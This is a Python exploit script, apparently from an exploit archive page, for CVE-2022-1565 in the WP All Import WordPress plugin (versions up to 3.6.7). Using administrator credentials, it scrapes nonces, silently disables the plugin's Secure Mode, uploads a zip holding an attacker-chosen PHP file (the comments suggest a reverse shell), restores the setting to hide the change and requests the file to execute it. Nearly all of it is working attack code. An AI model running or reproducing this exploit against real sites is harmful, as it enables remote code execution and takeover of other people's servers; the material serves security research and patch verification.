564d2ddf47
13 changes to exploits/shellcodes/ghdb DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) Helmet Store Showroom v1.0 - SQL Injection Human Resource Management System 1.0 - SQL Injection (unauthenticated) Revenue Collection System v1.0 - Remote Code Execution (RCE) WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) Outline V1.6.0 - Unquoted Service Path Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
285 lines
No EOL
14 KiB
Python
Executable file
285 lines
No EOL
14 KiB
Python
Executable file
# Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)
|
|
# Date: 11/05/2022
|
|
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
|
|
# Vendor Homepage: https://www.wpallimport.com/
|
|
# Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version)
|
|
# Version: <= 3.6.7 (tested: 3.6.7)
|
|
# Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload)
|
|
# CVE: CVE-2022-1565
|
|
|
|
#!/usr/bin/python
|
|
import requests
|
|
import re
|
|
import os
|
|
|
|
# WARNING: This exploit does NOT include the payload.
|
|
# Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work.
|
|
# If a file with the same name as the payload is already on the server, the upload will OVERWRITE it
|
|
#
|
|
# Please notice that I'm NOT the researcher who found this vulnerability
|
|
|
|
# # # # # VULNERABILITY DESCRIPTION # # # # #
|
|
# The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7.
|
|
# This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible.
|
|
|
|
# # # # # HOW THE EXPLOIT WORKS # # # # #
|
|
# 1. Prepare the zip file:
|
|
# - create a PHP file with your payload (e.g. rerverse shell)
|
|
# - set the variable "payload_file_name" with the name of this file (e.g. "shell.php")
|
|
# - create a zip file with the payload
|
|
# - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip")
|
|
#
|
|
# 2. Login using an administrator account:
|
|
# - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /)
|
|
# - set the variable "admin_user" with the username of an administrator account
|
|
# - set the variable "admin_pass" with the password of an administrator account
|
|
#
|
|
# 3. Get the wpnonce using the get_wpnonce_upload_file() method
|
|
# - there are actually 2 types of wpnonce:
|
|
# - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class.
|
|
# This wpnonce allows us to change the plugin settings (check the step 4)
|
|
# - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class.
|
|
# This wpnonce allows us to upload the file
|
|
#
|
|
# 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class
|
|
# - if the Secure Mode is enabled, the zip content will be put in a folder with a random name.
|
|
# The exploit will disable the Secure Mode.
|
|
# By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url).
|
|
# The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str)
|
|
# - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode.
|
|
#
|
|
# 5. Upload the file using the upload_file(wpnonce_upload_file: str) method
|
|
# - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully.
|
|
# The response will contain a JSON that looks like this:
|
|
# {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"}
|
|
# As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed
|
|
#
|
|
# 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method
|
|
#
|
|
# 7. Activate the payload using the activate_payload() method
|
|
# - you can define a method to activate the payload.
|
|
# There reason behind this choice is that this exploit does NOT provide any payload.
|
|
# Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters
|
|
|
|
# # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # #
|
|
# According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page"
|
|
# I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?)
|
|
# I had to find a workaround and so I did, by exploiting this option.
|
|
# WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7
|
|
|
|
# # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # #
|
|
# In order for the exploit to work please consider the following:
|
|
# 1. check the target_url and the admin credentials
|
|
# 2. check the path of the zip file and the name of the payload (they can be different)
|
|
# 3. if you're testing locally, try to set verify_ssl_certificate on False
|
|
# 4. you can use print_response(http_response) to investigate further
|
|
|
|
# Configure the following variables:
|
|
target_url = "https://vulnerable.wp/wordpress" # Target base URL
|
|
admin_user = "admin" # Administrator username
|
|
admin_pass = "password" # Administrator password
|
|
zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip)
|
|
payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell)
|
|
verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed.
|
|
|
|
# Do NOT change the following variables
|
|
wp_login_url = target_url + "/wp-login.php" # WordPress login page
|
|
wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings
|
|
payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here
|
|
re_enable_secure_mode = False
|
|
session = requests.Session()
|
|
|
|
# This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files.
|
|
class PluginSetting:
|
|
# Regular Expression patterns
|
|
pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>'
|
|
pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>'
|
|
pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};'
|
|
http_response: requests.Response
|
|
is_secure_mode_enabled: bool
|
|
wpnonce_edit_settings: str
|
|
wpnonce_upload_file: str
|
|
|
|
def __init__(self, http_response: requests.Response):
|
|
self.http_response = http_response
|
|
self.check_if_secure_mode_is_enabled()
|
|
self.retrieve_wpnonce_edit_settings()
|
|
self.retrieve_wpnonce_upload_file()
|
|
|
|
def check_if_secure_mode_is_enabled(self):
|
|
# To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked
|
|
# <input type="checkbox" value="1" id="secure" name="secure" checked="checked">
|
|
regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text)
|
|
if not regex_search:
|
|
print("Something went wrong: could not retrieve plugin settings. Are you an administrator?")
|
|
# print_response(self.http_response) # for debugging
|
|
exit()
|
|
self.is_secure_mode_enabled = "checked" in regex_search.group()
|
|
|
|
def retrieve_wpnonce_edit_settings(self):
|
|
# You can find this wpnonce in the source file by searching for the following input hidden:
|
|
# <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9">
|
|
# 052e2438f9 would be the wpnonce for editing the settings
|
|
regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text)
|
|
if not regex_search:
|
|
print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?")
|
|
# print_response(self.http_response) # for debugging
|
|
exit()
|
|
|
|
self.wpnonce_edit_settings = regex_search.group(1)
|
|
|
|
def retrieve_wpnonce_upload_file(self):
|
|
# You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b';
|
|
# dee75fdb8b would be the wpnonce for the upload
|
|
regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text)
|
|
if not regex_search:
|
|
print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable")
|
|
# print_response(self.http_response) # for debugging
|
|
exit()
|
|
|
|
self.wpnonce_upload_file = regex_search.group(1)
|
|
|
|
def wp_login():
|
|
global session
|
|
data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 }
|
|
login_cookie = { "wordpress_test_cookie" : "WP Cookie check" }
|
|
|
|
# allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found.
|
|
# Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not
|
|
print("Trying to login...")
|
|
response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate)
|
|
|
|
if response.status_code == 302:
|
|
print("Logged in successfully!")
|
|
return
|
|
|
|
# print_response(response) # for debugging
|
|
print("Login failed. If the credentials are correct, try to print the response to investigate further.")
|
|
exit()
|
|
|
|
def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response:
|
|
global session
|
|
if set_to_enabled:
|
|
print("Enabling secure mode...")
|
|
else:
|
|
print("Disabling secure mode...")
|
|
|
|
print("Edit settings wpnonce value: " + wpnonce)
|
|
data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 }
|
|
response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate)
|
|
|
|
if response.status_code == 403:
|
|
print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?")
|
|
# print_response(response) # for debugging
|
|
exit()
|
|
return response
|
|
|
|
def switch_back_to_secure_mode():
|
|
global session
|
|
|
|
print("Re-enabling secure mode...")
|
|
response = session.get(url=wp_all_import_page_settings)
|
|
plugin_setting = PluginSetting(response)
|
|
|
|
if plugin_setting.is_secure_mode_enabled:
|
|
print("Secure mode is already enabled")
|
|
return
|
|
|
|
response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings)
|
|
new_plugin_setting = PluginSetting(response)
|
|
if not new_plugin_setting.is_secure_mode_enabled:
|
|
print("Something went wrong: secure mode has not been re-enabled")
|
|
# print_response(response) # for debugging
|
|
exit()
|
|
print("Secure mode has been re-enabled!")
|
|
|
|
def get_wpnonce_upload_file() -> str:
|
|
global session, re_enable_secure_mode
|
|
# If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload
|
|
# If Secure Mode is already disabled, it just returns the wpnonce for the upload
|
|
|
|
print("Checking if secure mode is enabled...")
|
|
response = session.get(url=wp_all_import_page_settings)
|
|
plugin_setting = PluginSetting(response)
|
|
|
|
if not plugin_setting.is_secure_mode_enabled:
|
|
re_enable_secure_mode = False
|
|
print("Insecure mode is already enabled!")
|
|
return plugin_setting.wpnonce_upload_file
|
|
|
|
print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.")
|
|
response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings)
|
|
|
|
new_plugin_setting = PluginSetting(response)
|
|
|
|
if new_plugin_setting.is_secure_mode_enabled:
|
|
print("Something went wrong: secure mode has not been disabled")
|
|
# print_response(response) # for debugging
|
|
exit()
|
|
|
|
print("Secure mode has been disabled!")
|
|
re_enable_secure_mode = True
|
|
return new_plugin_setting.wpnonce_upload_file
|
|
|
|
def upload_file(wpnonce_upload_file: str):
|
|
global session
|
|
|
|
print("Uploading file...")
|
|
print("Upload wpnonce value: " + wpnonce_upload_file)
|
|
|
|
zip_file_name = os.path.basename(zip_file_to_upload)
|
|
upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file
|
|
files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))}
|
|
data = { "name" : zip_file_name }
|
|
response = session.post(url=upload_url, files=files, data=data)
|
|
|
|
if response.status_code == 200:
|
|
print("Server replied with HTTP 200 OK. The upload should be completed.")
|
|
print("Payload should be here: " + payload_url)
|
|
print("If you can't find the payload at this URL, try to print the response to investigate further")
|
|
# print_response(response) # for debugging
|
|
return 1
|
|
else:
|
|
print("Something went wrong during the upload. Try to print the response to investigate further")
|
|
# print_response(response) # for debugging
|
|
return 0
|
|
|
|
def activate_payload():
|
|
global session
|
|
|
|
print("Activating payload...")
|
|
response = session.get(url=payload_url)
|
|
|
|
if response.status_code != 200:
|
|
print("Something went wrong: could not find payload at " + payload_url)
|
|
# print_response(response) # for debugging
|
|
return
|
|
|
|
def print_response(response:requests.Response):
|
|
print(response.status_code)
|
|
print(response.text)
|
|
|
|
# Entry Point
|
|
def Main():
|
|
print("Target: " + target_url)
|
|
print("Credentials: " + admin_user + ":" + admin_pass)
|
|
|
|
# Do the login
|
|
wp_login()
|
|
|
|
# Retrieve wpnonce for upload.
|
|
# It disables Secure Mode if needed, then returns the wpnonce
|
|
wpnonce_upload_file = get_wpnonce_upload_file()
|
|
|
|
# Upload the file
|
|
file_uploaded = upload_file(wpnonce_upload_file)
|
|
|
|
# Re-enable Secure Mode if needed
|
|
if re_enable_secure_mode:
|
|
switch_back_to_secure_mode()
|
|
|
|
# Activate the payload
|
|
if file_uploaded:
|
|
activate_payload()
|
|
|
|
Main() |